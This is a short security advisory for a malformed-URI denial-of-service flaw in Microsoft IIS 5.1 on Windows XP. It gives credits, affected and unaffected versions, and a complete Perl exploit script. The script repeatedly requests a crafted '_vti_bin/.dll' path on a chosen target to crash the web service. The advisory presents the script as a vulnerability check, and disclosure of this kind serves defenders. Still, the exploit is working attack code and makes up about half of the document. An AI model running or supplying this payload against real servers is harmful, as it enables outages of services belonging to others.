Microsoft IIS Malformed URI DoS (Exploit)Summary
Microsoft Internet Information Services (IIS) is "a set of Internet-based services for servers using Microsoft Windows".
Microsoft's IIS 5.1, the version that comes with Windows XP, contains a security vulnerability in its handing of incoming requests that allows remote attackers to cause the service to crash by sending it a malformed request. The following exploit code can be used to determine whether you are vulnerable to the malformed URI request affecting the IIS or not.
Credit:
The information has been provided by IbliZ PhoeniX.
The advisory can be found at: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
Details
Vulnerable Systems:
* Microsoft Internet Information Server version 5.1
Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0
Exploit:
#!/usr/bin/perl
#Tested on IIS 5.1 Windos XP 2002
use LWP::UserAgent;
if(!$ARGV[0])
{
print "Hole found by Inge Henrikse\n";
print "Xplo Code by Ph03n1X || student.te.ugm.ac.id/~phoenix03\n";
print "Gunakan : $0 <target>\n\n";
exit;
}
$target=$ARGV[0];
#$proxy='http://222.124.24.23:3128';
$browse = LWP::UserAgent->new;
$browse->timeout(100);
$browse->agent("MSIE/6.0 Windows");
$browse->proxy(http=>$proxy) if defined($proxy);
$xplo="http://$target/_vti_bin/.dll/*\\~9";
for($i=0;$i<=20;$i++)
{$req = $browse->get($xplo);}
#No fix will be released by vendor until Win XP SP3
#(maybe in january 2006)
#EoF